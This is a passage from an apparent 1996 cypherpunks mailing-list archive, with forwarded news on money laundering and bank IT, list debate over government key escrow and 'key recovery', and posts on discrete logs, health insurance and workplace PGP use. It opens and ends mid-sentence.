funnel their illegal profits into the banking system through businesses or other means. Bachus said estimates of drug profits laundered through Mexico range from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's director, defended his agency's record, saying a combination of new rules and tougher enforcement in the past decade has ''made it more difficult to launder money in the U.S.'' and increased the costs of money laundering. Morris' agency enforces the Bank Secrecy Act, a key weapon against money laundering. As for the new rules aimed at foreign bank drafts, Morris said the regulations are more difficult than first expected because such restrictions also could hinder legitimate commerce. He said the proposal would be released soon. FinCen is working on other fronts to combat money laundering, which includes a new computer system that tallies bank fraud to help regulators gain an early warning of money laundering. In addition, the Clinton Administration assisted Mexico in adopting new anti-money laundering rules earlier this year. And Treasury Secretary Robert Rubin convened a conference of 29 nations in December 1995 to focus on the money laundering problem. One committee member, Rep. Maxine Waters, D-Calif., addressed the political context of the hearings. Waters said she was suspicious that the Republican-led Congress was holding ''a rash of hearings this month ... on the subject of drugs just as Presidential candidate Dole tries to use the issue as part of his campaign strategy against President Clinton.'' Waters said if the GOP-led House ''is truly serious about the impact of drugs'' it should hold hearings about charges raised in a San Jose Mercury News investigative series last month concerning the role CIA-backed rebels in Nicaragua played in bringing crack cocaine and weapons to Los Angeles and other cities. Bachus told Waters the hearing wasn't motivated by politics and that he had personally been involved in anti-drug efforts prior to his election to Congress. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From vznuri at netcom.com Tue Sep 17 23:13:00 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 18 Sep 1996 14:13:00 +0800 Subject: Diffie Hellman - logs in Galois fields In-Reply-To: <842896368.27767.0@fatmans.demon.co.uk> Message-ID: <199609180148.SAA28173@netcom3.netcom.com> >A question for the matematicians out there: heh. I'll answer anyway. >My maths tutor has told me a bit about the construction of Galois >fields (If I`m correct the construction is Z mod N, N some integer, >then a transformation F(x) on the residue classes already in the >field) I know also the definition is that there are P**k elements, p >a prime. what is 'k'? there are N elements in the field as I understand the terminology. >1. How can a field be finite, as by definition it has to be closed >under addition, subtraction, multiplication and division???? (sorry >if this one is a bit of a no brainer, maybe the definition is >different but I can`t seem to see how) the short answer is that all the operations are redefined somewhat to analogous operations that map into the range of integers. division is not defined for results that are not integers. actually division is replaced with an operation called "finding the inverse mod n". >2. Why is taking logs in a finite field computationally hard? - Me >and Alec (My maths tutor at college) guessed that it is because >exponentiation and logs are each others inverse functions, and >somehow this becomes a one way function in a finite field. actually, this is a very important question that already gets to the limits of current knowledge. the short answer is that there is *no*proof* that this problem is "hard". in fact such proofs are somewhat rare and exist mostly for contrived problems. in computational theory what one does is prove that your problem is at least as difficult as some other famous problem that many people have tried to find efficient solutions but have failed. this is called "NP Complete". as far as I know there is no proof that "taking logs in a finite field" is actually "hard". in fact there is no proof that factoring (an equivalent form of the problem) is "hard" or even a proof that it is np complete. most of this stuff is in the cryptography faq out there in cyberspace. I am writing in hopes that someone might amend the above by posting the latest academic thinking on the difficulty of factoring. From tcmay at got.net Tue Sep 17 23:24:34 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 14:24:34 +0800 Subject: The Near-Necessity of Health Insurance Message-ID: At 8:49 PM 9/17/96, Simon Spero wrote: >I wouldn't be so proud of the US health care system; the actual quality >of care is really pretty awful, even with insurance. Even though the >NAtional Health Service in the uK is woefully underfunded, I've always >had much better treatment than I have from HMOs here; even seeing a >specialist privately, at home, with no insurance, is cheaper than getting >an X-Ray looked at by someone who once met a radiologist a cocktail >party. ... >There are ideological reasons that argue for rejecting such >compulsory schemes based on that element of coercion; it's hard to >make the case against purely on efficiency grounds. Personally, I have not been a patient in a hospital in my entire adult life. Nor have I seen a doctor, except for a mandatory college physical in 1970 and an insurance company physical in 1977. I just haven't broken any bones, had any serious illnesses, or felt the need to visit a doctor, an emergency room, or a walk-in clinic of any sort. I suppose I've been lucky. Also, I dislike hospitals and avoid doctors unless there seems to be a compelling need. So far, there has not been. And, no, I don't have any health insurance of any kind. However, I am thinking about getting some. Not so much because I'm getting older, but because I fear a new phenomenon: hospital emergency rooms refusing admittance of patients unless they can present the proper patient-unit ID card (showing one is enrolled in Blue Shield, Blue Cross, Kaiser, or whatever). My dentist's receptionist/bill handler already seems flustered that I am paying my dental bills with a check, rather than giving her my insurer's account number. I also learned from a "60 Minutes" report, since confirmed elsewhere, that large hospitals routinely negotiate large discounts with large insurers, e.g., Blue Shield, so that while the "list price" of a typical day in a hospital may be an exorbitant $1800 a day ($30 for an aspirin, $75 for the lights-out bed check, etc...it all adds up!), Blue Shield has negotiated a fee of less than a third of that.... In other words, the person who insures himself (through savings and investments) and who offers to pay for treatment out of his own funds, may be at a serious disadvantage. He pays the inflated rates for services, and may face delays in being admitted to a hospital. (This space reserved for Duncan and others to explain how one can offer to pay in Krugerrands and to negotiate with the hospital on the spot. Meaning no disrespect to Duncan, but I doubt it is this easy. The mind-set of hospitals seems to be that anyone without a valid patient-unit card is obviously a derelict and indigent. And while all hospitals are required to accept derelicts and indigents in suitable emergencies--not a law I agree with--it is not desirable that one be treated as a derelict and undesirable. I hope I am conscious enough to give the admitting staff my financial health information.) Anyway, I'm thinking of finally bowing to the inevitable and starting to fork out $200-300 a month for health care I am unlikely to routinely use. (Obviously the folks who use their insurance routinely, as one of my engineers once used to do (he'd take his kids to the hospital every time they sneezed), are being subsidized by those of us who avoid hospitals at all costs.) I'm not arguing for national health care, just noting that we effectively are getting it, between the "Poor People" having subsidized care and the "Rest of Us" in employer-funded or private health care plans. Cash is already dead at most hospitals. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From vznuri at netcom.com Tue Sep 17 23:32:42 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 18 Sep 1996 14:32:42 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: <199609180201.TAA29368@netcom3.netcom.com> again, more black/white cpunk thought that goes along the lines, "unless we have won everything, we have lost everything". you guys are awfully cynical. clipper has failed its original objectives by miles. the last-ditch efforts by bureacrats to get some semblance of "key escrow" from recent developments are increasingly pathetic. I'd say the significant dilution of clipper over the years is a very strong victory for pro-privacy, pro-cryptography advocates. the Clipper proposals are increasingly moving into the area of "key management". large companies will always want key management features, to deal with employees who forget passwords, leave the company, etc.-- face it, this is a simple reality. essentially all the latest moves amount to, imho, is the government trying to get its fingers into these key management infrastructures. so the recent stuff that is emerging, I would hesitate to call "gak". it sounds more like "gaki", or government access to key infrastructures. these infrastructures are going to be built up regardless of what cpunks wish-- private businesses simply must have them. frankly all it looks like to me is the government saying, "we reserve the right to subpoena keys". this will always be the case. bureacrats are always trying to pass new laws when old ones already apply. >It is a done deal, >--Lucky, who told you this three years ago. again, more simplistic summaries. there is a whole range of evil proposals that the government could be involved in, and we have to begin to discriminate between them. the government could be the sole manager of all key infrastructures and the entity that licenses all crypto for any use-- that I would consider total worse case reality. or the government could have tentacles stuck into key infrastructures that businesses build up. the latter is not quite as odious or threatening. in fact it simply sounds like the government saying, "we reserve the right to subpoena keys". (of course the latter could always evolve into the former. I suppose the cynics would contend that it is inevitable.) From osborne at gateway.grumman.com Tue Sep 17 23:37:44 1996 From: osborne at gateway.grumman.com (Rick Osborne) Date: Wed, 18 Sep 1996 14:37:44 +0800 Subject: PGP in the workplace Message-ID: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com> Here's one I figure you all would just love: Yesterday afternoon, I was told by some higher-level associates of mine (not Management level, mind you, just people higher on the food chain) that my use of PGP in the coporate environment was not appreciated and could result in my being looked upon *very* unfavorably by the managerial crowd. Without even delving into security reasons, I politely explained to them that due to my job (which has several crypto-related applications) I needed PGP to communicate with people and list-bots in the outside world (or they could gladly pay for my formal training). The just shook their heads and said "be careful, you've been noticed". I was then told to stop 'messing around' in my shell account. I asked what was meant by this, and apparently it had been noticed that I had done a few things, which I had done to simply check the security of my account, which could be viewed as 'inappropriate'. You know what they were? 1. I checked to see if the passwd file was available to anyone (was it shadowed, etc.). This was seen as an attempt to GET the passwd file, and thereby have access to sensitive data. 2. I change my password regularly (once a week). Now this may seem excessive (it apparently did to them), but you must understand that the entire IS department is extremely buddy-buddy here. Over half of the users have root passwords on any given system. I don't feel like sharing, horrible me. I guess my regular chaning of passwords was seen as a strain on the system (ha!), as they didn't elaborate *why* I had been flagged for this. Upon explaining to them that I was simply trying to make sure of my own security, I was told that I was to just assume that I was secure, and that *any* 'poking around' was found to be "highly aggravating" and could only only "exascerbate the situation further." Luckily, I had to get to class, so I cut the conversation before it could get any more out of control. Now, seeing as I'm fairly new to the Corporate world, but is this something common? I know when I was at college, poking around was expected and encouraged, as it helped find and plug holes in the system. But this is almost like some kind of protection racket here! ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "Yes, evil comes in many forms, whether it be a man-eating cow or Joseph Stalin, but you can't let the package hide the pudding! Evil is just plain bad! You don't cotton to it. You gotta smack it in the nose with the rolled-up newspaper of goodness! Bad dog! Bad dog!" - The Tick From dlv at bwalk.dm.com Tue Sep 17 23:37:50 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 14:37:50 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: "Z.B." writes: > On Mon, 16 Sep 1996 paul at fatmans.demon.co.uk wrote: > > > > > > > The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ > > along the following lines: > > > > Q> What do it do when I join the list? > > A> Killfile *@bwalk.dm.net > > > How about we go just a little farther than that and set up Procmail to > bounce all of his messages back to him? I'd hate to see his inbox if > enough of us started doing that! > > > > > > Datacomms Technologies web authoring and data security > > Paul Bradley, Paul at fatmans.demon.co.uk > > Http://www.fatmans.demon.co.uk/crypt/ > > "Don`t forget to mount a scratch monkey" > > > > --- > > Zach Babayco > > zachb at netcom.com <----- finger for PGP public key > http://www.geocities.com/SiliconValley/Park/4127 > > Yeah!!! And I'll bounce each mailbomb to everyone who tries it. Won't that be fun. Too ba your netcom account won't last long. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tob at world.std.com Tue Sep 17 23:38:36 1996 From: tob at world.std.com (Tom Breton) Date: Wed, 18 Sep 1996 14:38:36 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609180100.AA07744@world.std.com> jbugden at smtplink.alis.ca writes: > I don't think that a reasonable person would argue that medical > insurance should be outlawed because everyone should take care of their > own needs. A social safety net is simply a form of health and life > insurance. Statistical arbitrage if you will. By spreading the risk you > minimize the cost. Yes, some people will take advantage of the system. > But like a virus, a robust system should be able to withstand this form > of attack. It's too bad you received such fingers-in-the-ears libertarian-scream responses to this. You deserved a better answer than that. Not that I entirely agree. Let me quote part of something I once wrote on essentially this topic: "With *real* insurance it's tough enough to root out fraud. How can an unwritten, virtual policy, knowable only through deduction, addressing our entire circumstances of birth, that the insured may deny contracting to or may disagree about what the terms were, be easy to sort out?" Tom From declan at eff.org Tue Sep 17 23:53:12 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 18 Sep 1996 14:53:12 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant In-Reply-To: <199609171531.BAA22478@suburbia.net> Message-ID: Clearly, we must have only professional political views here. -Declan On Wed, 18 Sep 1996, Julian Assange wrote: > > And what am I paying for...to protect the status quo. I believe that > > there is more than enough help for ppl available. They just need to > > get off their butts and work. > > Do we really need your amatuer political views? > > -- > "Of all tyrannies a tyranny sincerely exercised for the good of its victims > may be the most oppressive. It may be better to live under robber barons > than under omnipotent moral busybodies, The robber baron's cruelty may > sometimes sleep, his cupidity may at some point be satiated; but those who > torment us for own good will torment us without end, for they do so with > the approval of their own conscience." - C.S. Lewis, _God in the Dock_ > +---------------------+--------------------+----------------------------------+ > |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | > |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | > |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | > +---------------------+--------------------+----------------------------------+ > // declan at eff.org // I do not represent the EFF // declan at well.com // From vznuri at netcom.com Tue Sep 17 23:59:43 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 18 Sep 1996 14:59:43 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: <199609180338.UAA27100@netcom15.netcom.com> [business key management plans/infrastructures] >However, making the government a _required_ part of such plans implies a >motive that is not at all the same as what companies wish (mostly, disaster >recovery). the distinction lies in the terminology. what does it mean, "required part of the plan". if it essentially amounts to nothing more than the government saying, "you must give us keys when we present you with a subpoena/warrant", then that's no different than the system we have today. again, granted, laws specifically aimed at crypto can tend to take up a life off their own. but my main point was that the gloom-and-doom peddled by you and lucky green over clipper just doesn't mesh with the actual events. the government has visibly had to *backpeddle* *numerous* times in all of its clipper proposals. I see no evidence that the latest proposals are going to be any different. what annoys me is people who are crying wolf all the time, and even when it seems there are no wolves around, or they have temporarily receded, they say, "I told you so". "the wolves really are going to devour you, just you wait and see" And, as has been noted so many times by so many of us, whatever >the motivations for corporate key escrow systems for disaster planning are, >there are no motivations for key escrow for _communications_. If the sender >dies, or leaves, or whatever, the company can reconstruct his >communications from _his_ key. Or the receiving side can reconstruct the >recipients messages from _his_ side. this doesn't parse to me. the simple situation that may occur: employee [x] creates a key on behalf of company [y]. employee [x] forgets or misplaces the key. company [y] needs to retrieve key, and cannot go to other company to get it (imagine situations such as encrypted internal files, for example, although it holds equally well for communications-- it would be very embarrassing to ask another company for the key to decode something you sent them because you misplaced it). I think cpunks tend to blur and obfuscate this use of crypto-- i.e. nonpersonal use within companies. what you seem to be saying is that companies should not have to escrow keys involving communications. i.e. the communications should be readable only between the communicators. but this makes no sense to me either. companies wish to have permanent record of all official correspondence. they don't send messages and then don't keep them around, like guerilla cypherpunks spend all day doing. ("YIKES!!! that msg has been on my hard drive 5 minutes!! better delete it FAST") >The only party interested in having access to "in transit" communications >are the wiretappers and SIGINT folks. Think about it. No company I can >think of is interested in reconstructing messages from the _actual >communications_, only from the keys of employees. bzzzt. "actual communications" == records of transactions between companies. we are talking about everything that companies send back and forth: bills, contracts, agreements, etc.-- virtually everything that companies send each other, they keep on permanent record. The NSA and FBI, however, >are _keenly_ interested in reconstructing messages from intercepts, of >course, and hence are pushing for escrow of _communications_ keys! hmmmm, this distinction you are now promoting of communication keys, vs. whatever other kind their are (backups?) is something I've not noticed you or others emphasize before, I would have to think about it. frankly I don't see a whole lot of difference between what you are calling "communication" keys and whatever else crypto is used for. look, consider this: the government got its tentacles into every business key database in existence, in the sense they can easily open them when they get wiretaps/warrants. yet individuals were still free to send crypto everywhere. how would this be much different than today's system, other than that the government has more efficient access once the order is granted? >Furthermore, the main worry (for me, at least) is that the government hopes >to get its Clipper IV scheme accepted (by means of export laws) at some >large fraction of important corporate accounts, not the least of which will >be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players >in the "infrastructure" business. Once most of these have "bought off" on >GAK, pressure will be intense to universalize the process, to make it a >felony _not_ to use a "Key Authority." that's a big, big leap, the kind that cpunks always love to make to sell you on the dystopian orwellian nightmare they are always ranting about. the things that companies use keys for can be pretty different from what individuals would use them for. the government can already get any info it wants through a subpoena or warrant from a company, and they will comply. how is this different than what you are referring to? you are making a leap that if companies have internal key infrastructures to protect their information, that the restrictions on them will automatically carry over to private communications between individuals such as in e.g. a telephone like scenario. look, we already today accept that employee's liberties do not necessarily hold within a company. the concepts of "freedom of speech," "privacy" etc. do not necessary hold within companies. >(BTW, I predict that the tainted term "key escrow" is now gone from the >official lexicon. I haven't seen the Clipper IV proposal, but I surmise >that the baggage the term "key escrow" carries means that some more >benign-sounding term will be used in the final proposal. Something like >"Key Recovery System." You heard it here.) I hate the misuse and abuse of the english language in Orwellian fashion (The Great Plan to Protect the Integrity of Data Communications) as much as you do, but there are some very significant distinctions that are being glossed over. the new proposals are radically more diffused than the original clipper plan imho. the government is clearly in the process of backpeddaling. it's got all the signs of desperation imho. if they didn't succeed with the original clipper, what makes you think the more recent proposals are all that sinister and likely of succeeding? you evade my basic point: perhaps in all the key escrow language in the bills, it would all boil down in practice to, if we have a subpoena or a warrant, you have to give us the keys. how is that different than what we have now? cpunks -- I am not an apologist for clipper. but I want everyone to realize that to promote crypto, you have to intrinsically support some things like a robust key infrastructure. who is going to provide it? do you think that whoever does will be *exempt* from warrants and subpoenas? that is not a system that we have now, nor is it likely we ever will. moreover, few but only the most ardent extremists would argue such a system would be incompatible with "freedom" as we understand it in this country. "government == evil" is a very simplistic outlook in life that can come back to bite you bigtime, imho. there are some people in government that share cpunk views and could do some good if they weren't lumped in with the evil spooks who really are trying to enslave humanity (hee, hee) From shamrock at netcom.com Wed Sep 18 00:00:42 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 15:00:42 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Timothy C. May wrote: > However, making the government a _required_ part of such plans implies a > motive that is not at all the same as what companies wish (mostly, disaster > recovery). The required part will come later. Meanwhile, many big players in the industry are volunteering to include GAK for you. When I asked the fellow from HP that proposed the CommerceNet position paper how the "voluntary key recovery" he was proposing on his slides could possibly aid law enforcement against criminals who obviously wouldn't "escrow" their keys, he said, and I am not kidding: "There are many possible interpretations of the words voluntary and mandatory." I was the *only* person in a room full of people working in the industry that seemed bothered by this. > Furthermore, the main worry (for me, at least) is that the government hopes > to get its Clipper IV scheme accepted (by means of export laws) at some > large fraction of important corporate accounts, not the least of which will > be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players > in the "infrastructure" business. Once most of these have "bought off" on > GAK, pressure will be intense to universalize the process, to make it a > felony _not_ to use a "Key Authority." That's exactly how it will be. > (BTW, I predict that the tainted term "key escrow" is now gone from the > official lexicon. I haven't seen the Clipper IV proposal, but I surmise > that the baggage the term "key escrow" carries means that some more > benign-sounding term will be used in the final proposal. Something like > "Key Recovery System." You heard it here.) Correct. As I explained in my post from the CommerceNet meeting in D.C., "key recovery" is the new politically correct term for GAK. --Lucky From dlv at bwalk.dm.com Wed Sep 18 00:02:43 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:02:43 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: Financial Times: Wednesday, September 4, 1996 IT: A Spider's Web for the Banking Sector Interview with Joseph De Feo By Paul Taylor The influence of network computing and other technologies extends into all aspects of the industry. Barclays' director of group operations and technology believes it will have a profound effect on traditional banking. 'It's going to change the whole way business is conducted,' he forecasts Joseph De Feo has built up a formidable reputation as an effective business leader and banking visionary since he joined Barclays Bank as director of group operations and technology nearly seven years ago. American-born Mr De Feo, who joined Barclays from merchant bankers Morgan Grenfell after spells with both Goldman Sachs, the Wall Street investment bank, and Chase Manhattan, the third-biggest US bank, is also widely regarded as one of the banking industry's most outspoken, and influential, IT users. He believes the main issue facing the banking industry is the impact of electronic delivery mechanisms and the changes which will be wrought by introducing electronic delivery to replace physical branch delivery in retail banking services. But although he believes changes in retail banking may be the most visible, he says the impact of the broader capability of networks and networking will be just as dramatic on the wholesale and investment banking business. "It is engendering a situation in which there will be a wholesale reconstruction of the value chains in the business model for the industry, where you could envision networks of specialist companies, each focused on a specific area - say research, analytics, trading, investment banking, distribution. . . "This sort of change has actually occurred in other industry sectors - the commodity end of the business is being concentrated into a smaller number of global producers, and the rest of the business is being fragmented among many thousands of very focused and specialised players." He believes that, faced with such challenges, banks will adopt different strategies. Some, such as JP Morgan in the US, will quit the "manufacturing" end of banking, and sub-contract out the processing. Others will specialise in transaction processing, in much the same way that National Westminster Bank is providing the back-office capability for supermarket chain Tesco's recently-launched loyalty card in Britain. Overall, he thinks the number of jobs in retail banking will fall as capital is substituted for labour. "I think the aggregate labour content in all aspects of the business will go down, but not at the same rate as it will in retail banking." In Britain, he warns, the adjustment will be disproportional, "because we hesitated on the capitalisation of the automation of the branch networks." Delaying automation of the traditional branch networks could also make it more difficult for the banks to respond to new and often lower-cost competitors, including retailers such as Marks and Spencer and Virgin which do not have the same infrastructure costs. In addition, he notes, it takes time to respond to new competition and new delivery channels. "You still have to support the branch network. The more inefficient that branch network is, the higher the burden of cost - so you are really stuck if you have huge costs." Unlike some of his colleagues, however, Mr De Feo does not believe that bank branch networks will disappear overnight. "When I first joined the group, lots of people were saying we need to cut the branch network in half in the long run. It was a real big issue - we were obsessed with the numbers of branches. I kept saying to them that you have to start on a more rational base and judge what is effective for the group to have as a physical branch distribution network." While he believes the bank's branch network is still costing a lot more, probably five or six times more, than it ought to, he argues that the decision on an individual outlet "could change very dramatically if the branch was much cheaper to keep open." "We have not closed nearly as many branches as people had originally thought we were going to, because the cost of us having an outlet open is much lower than many other banks," he says. Barclays has cut the cost of its branches "by reducing the labour content, by having more customer volume go though each branch, so that the effectiveness and efficiency of an outlet is improved." He notes that in the US, "if you count electronic branches, there are more branches opening - they are not closing branches. . . the individual cost of those locations is a fraction of what it is in this country." Even with the advent of electronic purses and smart cards, Mr De Feo believes there will still be a need for physical bank outlets. "We really need physical bits of paper in our hand to do business. . . so it is going to take a long time to get rid of the physical locations; probably 25-30 years." Ahead of that, he believes there could actually be an increase in bank outlets. "I would predict that you will see an increase in penetration in supermarkets of electronic branches, or [branches] where there is one person, in this country. "I think you will see more express branches like we have just put up in Tunbridge Wells, which will either be semi-manned or unmanned." He thinks these low cost "convenience branches" will be supplemented by telephone banking, or banking via a digital television or via personal computer. "We had better do it because we are going to struggle strategically to keep our branch identity, the way things are going," he says. "We have got strong branch identity in the industry, but that could be usurped very quickly, especially for the traditional products because we don't satisfy primary needs." Mr De Feo makes his point using a potential car buyer as an example. "If you need to borrow money for a car, it is not because you want to borrow money, it's because you want a car." If, as is beginning to happen, car manufacturers bundle in the financing, "why would you bother to go to a bank?" If the carmaker has a good credit rating, it can raise money cheaper than the banks - so it is sensible for the carmaker to arrange the finance because it can make an additional small profit on the loan. Like other large financial institutions, Barclays is a big IT spender. But does Mr De Feo think that the bank gets value for money? "I think that in Barclays we are now getting to the point where we are - and it shows in our results, and in the recognition we are getting, and the way in which the business attitude towards IT has changed. The level of suspicion that IT was sort of a thing that was on its own, and spending money because they wanted more toys, is dissipating. "If you look at the core businesses of the group, whether you are talking about BZW or the asset management business, we are now much more thoroughly integrated in terms of how technology is being used. We have still got a way to go because we are not on an appropriate strategic platform because the knowledge gap is still there and we need to understand better how these technologies are going to transform business. Sophisticated banking IT systems, such as those used in credit behaviour scoring, knowledge-based techniques and corporate lending assessment, are now commonplace. "IT has improved the quality of our lending, our decision-making, our communication with our customers, because it is clearly more objective. It is more explainable; it is not like I turned you down for a loan because I don't like the look of you." He believes the relationship between banks and the IT vendors has also changed. "It is a matter of choosing partners now," he says, "the functional differences are less significant in vendor selection than they used to be." Mr De Feo argues that one of the biggest challenges facing the financial services sector is ensuring that the wide variety of legacy systems work together. "That glue - how you get the network of these applications brought together - is extraordinarily important. Mr De Feo says that IT users need infrastructure standards which would allow different proprietary technologies to be brought together. "The Internet offers some of it but the Internet is weak in systems management and security. The most important aspect of the Internet is that it has given a glimmer of what is possible with network-based computing. "It is like a very weak light-bulb going on in an absolutely dark room, and what I worry about is that we will not be able to fulfil the promise because there are so many holes in the management and the security side of it. "We are OK now because it is being used as an information dissemination vehicle, and an e-mail vehicle, but when we start doing serious applications using that technology it's all going to bubble to the surface and we're going to see the same sort of problems with the Internet as enterprises are having in gluing together computer systems that were built on IBM or Digital Equipment technology." Eventually, Mr de Feo believes Microsoft will produce the "glue" to bind disparate systems together, but he cautions: "It is going to be very hard for Microsoft because it is going to push them into spaces they have never occupied before." Similarly, he believes that the real potential of network computing will only be realised if it enters the commercial sphere. He says: "That will only happen if the financial services element is solved. We have got to get all that sorted out, so all of this has got to be brought together at some point soon, otherwise things will go into a slowdown until they get resolved. "There are all sorts of initiatives to work on: the security, and work on the systems management, and so on. But the cohesiveness of those efforts is not apparent." Ultimately he believes network computing and other technologies will have a profound effect on traditional banking. "It's going to change the whole way business is conducted," he says. "The influences of all these technologies extends like a spider's web out into all aspects of the industry." Financial Times: Wednesday, September 4, 1996 Global Finance Sector Maintains Its IT Edge By Paul Taylor >From Internet banking and multimedia kiosks to electronic trading rooms and risk management systems, the future of the global financial services industry is inextricably linked to information technology. The financial services sector is already one of the biggest spenders on information technology -- spending made necessary not just to reduce costs, but also to maintain an edge in an increasingly competitive market where new entrants and new channels to market are eroding traditional boundaries. For example, in the insurance sector, Datamonitor, the market research firm, predicts that 95 per cent of the UK's largest insurance intermediaries will have direct operations by 1998. Datamonitor also believes that by 1998 some 70 per cent of insurance companies will have Internet sites. The intensification of competition within the financial services sector reflects the deregulation of the industry which has attracted new entrants. Other factors are globalisation and technology which have swept aside barriers to entry and lowered the cost of doing business. As a result, in order to thrive in the 1990s, financial service organisations are as much in the business of managing and manipulating information as managing and making money. "Our industry is information based - it is absolutely essential - and the relationship of technology management, technology usage and business management is one of the critical skills," says Joseph De Feo, director of group operations and technology at Barclays bank. "If people in financial services companies say they don't understand technology, or are afraid of technology, it is just like saying 'I am not qualified to do my job'," says Mr De Feo. The fate of many financial institutions, as they gear up to face this new competition, will depend on the successful deployment of data processing resources, telecommunications systems and software. "The financial services industry is faced with unprecedented challenges - increasing competition, a technology revolution, a highly unpredictable economic and political climate, consumerism and rapidly evolving legislation," said Andersen Consulting in a recent report*. John Reed, chairman of leading US commercial bank Citicorp, has expressed concern that banks and securities firms risk being reduced to "a line or two of application code on a network." Such concerns are understandable given the competitive pressures that banks and other financial institutions now face. "Financial services companies are trying to drive down or stabilise costs," says Ian Peackock, a consultant with Logica, the UK-based computer services group. "Another big area for them is systems integration." "When the banking history of this century is written, the decade from 1990 to 2000 will be seen as the defining moment," said Price Waterhouse in a recently published report on the challenge of virtual banking. "A new generation of non-bank competitors poised to harness new forms of technology could radically alter the structure of the traditional banking system as we know it. Today, opportunities are being exploited by software companies, consumer companies and even large and influential media owners. The threat to the traditional 'bricks and mortar' banking system is very real." In America, US telecoms group AT&T became the second-largest card issuer in the world with more than 15m accounts in just five years. Ford Motor, which now generates 20 per cent of its US revenues from financial services, now positions itself in the UK as "the branchless bank". Business Week magazine noted: "Banking is essential to a modern economy. Banks are not" -a view echoed by Bill Gates, chairman of Microsoft, who warned: "Banks are dinosaurs. Give me a piece of the transaction business and they are history." Meanwhile, the IT specialists at Deloitte & Touche argue that "Technology will change the retail banking industry fundamentally in the years to come." They believe that banks will lose their monopoly as centres for money transmission - in other words, the activity of transmitting money from one person or company to another will increasingly be carried out by a variety of competing providers. In addition, distribution channels for retail banking products will proliferate. "Whereas in the past the bank branch was the only channel for distributing most financial services products, in the future a number of different channels will continue to erode the branch's predominance," say Deloitte & Touche. Finally they argue that the fully integrated bank will fragment into specialist categories. Braxxon Technology, an IT management and systems consultancy, estimated recently that leading international banking institutions face a combined IT bill of $ 4bn to replace their existing global trading settlement systems for bonds and equities. After a survey of large banks, Braxxon concluded that the top 50 world investment banks would need a global investment of at least $ 80m each to replace existing settlement systems which have failed to keep pace with business and regulatory requirements. The survey also revealed that 30 per cent of banking systems are more than 10 years old - and three out of every five banks have already started replacing their systems. Financial institution spending on IT is also likely to be increased over the next few years in order to tackle issues such as the so-called millennium problem which affects older software, much of which is running on mainframe machines. Ultimately, as the worlds of information processing and financial services collide, most financial institutions realise that they have little choice but to increase their IT expenditure while ensuring that they use technology as efficiently as possible to deliver their customers fast, flexible and competitively priced services. *Financial Services in a Virtual World. Forbes ASAP: August 26, 1996 The Money Changers: Digital cash Innovators Sholem Rosen: Citibank V.P., Emerging Technologies SHOLOM ROSEN heads Citibank's emerging technologies group, which has devised a digital cash system. Rosen invented the technology, slated to be released in late 1998, that will make possible the electronic management of cash. The 55-year-old Rosen, a former math professor at Johns Hopkins University, talked with FORBES ASAP's Lee Patterson about Citibank's digital cash plan. ASAP: What has Citibank developed that's different from other electronic money technology? ROSEN: We've developed EMS, which stands for Electronic Monetary System. It allows you to transact personal or commercial business without the need of a third party. If you pay me $10 for a good or service, the money goes directly to me -- it doesn't go through a bank. EMS supports all currencies, so you could pay someone in yen, dollars or marks. In our system, the money circulates just like cash, except our "EMS note" carries a complete audit trail. If your e-money is lost or stolen, it can be redeemed. ASAP: Software companies are aggressively pursuing the electronic commerce and banking markets. How do you think Citibank's name will stand up to the likes of Microsoft or DigiCash? ROSEN: Citibank understands consumer marketing. Every card in my wallet has the Citibank brand name on it. You may not lie loyal to your bank yet, but the idea is to make you loyal by providing services that make your life a lot easier. If Microsoft or another software company wants to be a competitor, it's still going to have to sign up with banks to do business. Internet money is not going to be of any value if you can't turn it into real money you can use in the physical world. You have to go through the banking system to do that. ASAP: How did you feel a year ago when you heard the plans for a Microsoft/Intuit merger? ROSEN: Personally, I didn't think much of it at all. I believe banks are more concerned they'll be captive to what technology companies deliver to the consumer rather than having their businesses taken over. ASAP: But why will consumers come to Citibank for their technology needs when they can go to Microsoft or Intuit? ROSEN: Because Citibank has better technology. We give away our home banking software, and it's much more functional than anything you're going to pay to get from Intuit. Technology companies are definitely competition, but we have been approaching electronic money from an application standpoint and applying technology to it -- not the other way around. ASAP: Much of the focus of e-money technology centers on security. How secure is Citibank's system? ROSEN: Security has to be in the hardware, not the software. Our security is built into a proprietary chip we've developed. We're going to use cryptography that 